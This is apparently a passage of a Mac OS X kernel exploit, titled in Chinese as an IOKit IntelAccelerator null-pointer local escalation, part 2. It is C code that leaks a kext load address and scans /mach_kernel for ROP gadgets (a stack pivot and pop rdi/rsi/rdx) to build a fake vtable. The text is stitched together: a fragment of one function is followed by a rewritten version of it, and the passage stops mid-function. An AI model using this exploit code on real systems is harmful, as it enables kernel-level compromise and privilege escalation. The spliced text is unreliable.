Apple Mac OS X IOKit IntelAccelerator空指针间接引用本地(2)

for(CFIndex i = 0; i < count; i++){
    const char *name = CFStringGetCStringPtr(CFDictionaryGetValue(values[i], CFSTR("CFBundleIdentifier")), kCFStringEncodingMacRoman);
    if (strcmp(name, target_name) == 0){
      CFNumberGetValue(CFDictionaryGetValue(values[i],
                        CFSTR("OSBundleLoadAddress")),
                        kCFNumberSInt64Type,
                        &addr);
      printf("%s: 0x%016llx\n", name, addr);
      break;
    }
  }
  return addr;

}

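/*
 * Look up the load address of the com.apple.iokit.IONDRVSupport kext by
 * walking the loaded-kext info dictionary returned by
 * OSKextCopyLoadedKextInfo().
 *
 * Returns the kext's OSBundleLoadAddress value, or 0 when the kext list
 * cannot be obtained, the kext is not in the list, or its entry has no
 * readable load address.  Prints the address when it is found, as before.
 *
 * Fixes over the previous version: the dictionary copy and the values
 * array are released on every path (both leaked), malloc and the CF
 * lookups are checked instead of being dereferenced blindly, and the
 * identifier is copied out with CFStringGetCString because
 * CFStringGetCStringPtr may return NULL (strcmp on NULL is UB).
 */
uint64_t load_addr(){
  uint64_t addr = 0;
  CFDictionaryRef kd = OSKextCopyLoadedKextInfo(NULL, NULL);
  if (kd == NULL)
    return 0;

  CFIndex count = CFDictionaryGetCount(kd);
  const void **values = NULL;
  if (count > 0)
    values = malloc(sizeof *values * (size_t)count);
  /* Covers both an empty list (nothing to search) and allocation failure. */
  if (values == NULL) {
    CFRelease(kd);
    return 0;
  }

  /* Only the per-kext info dictionaries are needed; keys may be NULL. */
  CFDictionaryGetKeysAndValues(kd, NULL, values);

  for (CFIndex i = 0; i < count; i++) {
    CFDictionaryRef info = values[i];
    CFStringRef id = CFDictionaryGetValue(info, CFSTR("CFBundleIdentifier"));
    if (id == NULL)
      continue;

    /* Copy into a local buffer: a direct C-string pointer is not always available. */
    char name[256];
    if (!CFStringGetCString(id, name, sizeof name, kCFStringEncodingMacRoman))
      continue;
    if (strcmp(name, "com.apple.iokit.IONDRVSupport") != 0)
      continue;

    CFNumberRef num = CFDictionaryGetValue(info, CFSTR("OSBundleLoadAddress"));
    if (num != NULL && CFNumberGetValue(num, kCFNumberSInt64Type, &addr)) {
      printf("%s: 0x%016llx\n", name, addr);
    } else {
      /* Entry present but unreadable: report "not found" rather than a partial value. */
      addr = 0;
    }
    break;
  }

  free(values);
  CFRelease(kd);
  return addr;
}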

uint64_t* build_vtable(uint64_t kaslr_slide, size_t* len){
  uint64_t kernel_base = 0xffffff8000200000;
  kernel_base += kaslr_slide;
     
  int fd = open("/mach_kernel", O_RDONLY);
  if (!fd)
    return NULL;

struct stat _stat;
  fstat(fd, &_stat);
  size_t buf_len = _stat.st_size;

uint8_t* buf = mmap(NULL, buf_len, PROT_READ, MAP_FILE|MAP_PRIVATE, fd, 0);

if (!buf)
    return NULL;

/*
  this stack pivot to rax seems to be reliably present across mavericks versions:
    push rax
    add [rax], eax
    add [rbx+0x41], bl
    pop rsp
    pop r14
    pop r15
    pop rbp
    ret
  */
  uint8_t pivot_gadget_bytes[] = {0x50, 0x01, 0x00, 0x00, 0x5b, 0x41, 0x5c, 0x41, 0x5e};
  uint8_t* pivot_loc = memmem(buf, buf_len, pivot_gadget_bytes, sizeof(pivot_gadget_bytes));
  uint64_t pivot_gadget_offset = (uint64_t)(pivot_loc - buf);
  printf("offset of pivot gadget: %p\n", pivot_gadget_offset);
  uint64_t pivot = kernel_base + pivot_gadget_offset;

/*
    pop rdi
    ret
  */
  uint8_t pop_rdi_ret_gadget_bytes[] = {0x5f, 0xc3};
  uint8_t* pop_rdi_ret_loc = memmem(buf, buf_len, pop_rdi_ret_gadget_bytes, sizeof(pop_rdi_ret_gadget_bytes));
  uint64_t pop_rdi_ret_gadget_offset = (uint64_t)(pop_rdi_ret_loc - buf);
  printf("offset of pop_rdi_ret gadget: %p\n", pop_rdi_ret_gadget_offset);
  uint64_t pop_rdi_ret = kernel_base + pop_rdi_ret_gadget_offset;
   
  /*
    pop rsi
    ret
  */
  uint8_t pop_rsi_ret_gadget_bytes[] = {0x5e, 0xc3};
  uint8_t* pop_rsi_ret_loc = memmem(buf, buf_len, pop_rsi_ret_gadget_bytes, sizeof(pop_rsi_ret_gadget_bytes));
  uint64_t pop_rsi_ret_gadget_offset = (uint64_t)(pop_rsi_ret_loc - buf);
  printf("offset of pop_rsi_ret gadget: %p\n", pop_rsi_ret_gadget_offset);
  uint64_t pop_rsi_ret = kernel_base + pop_rsi_ret_gadget_offset;
   
  /*
    pop rdx
    ret
  */
  uint8_t pop_rdx_ret_gadget_bytes[] = {0x5a, 0xc3};
  uint8_t* pop_rdx_ret_loc = memmem(buf, buf_len, pop_rdx_ret_gadget_bytes, sizeof(pop_rdx_ret_gadget_bytes));
  uint64_t pop_rdx_ret_gadget_offset = (uint64_t)(pop_rdx_ret_loc - buf);
  printf("offset of pop_rdx_ret gadget: %p\n", pop_rdx_ret_gadget_offset);
  uint64_t pop_rdx_ret = kernel_base + pop_rdx_ret_gadget_offset;

munmap(buf, buf_len);
  close(fd);
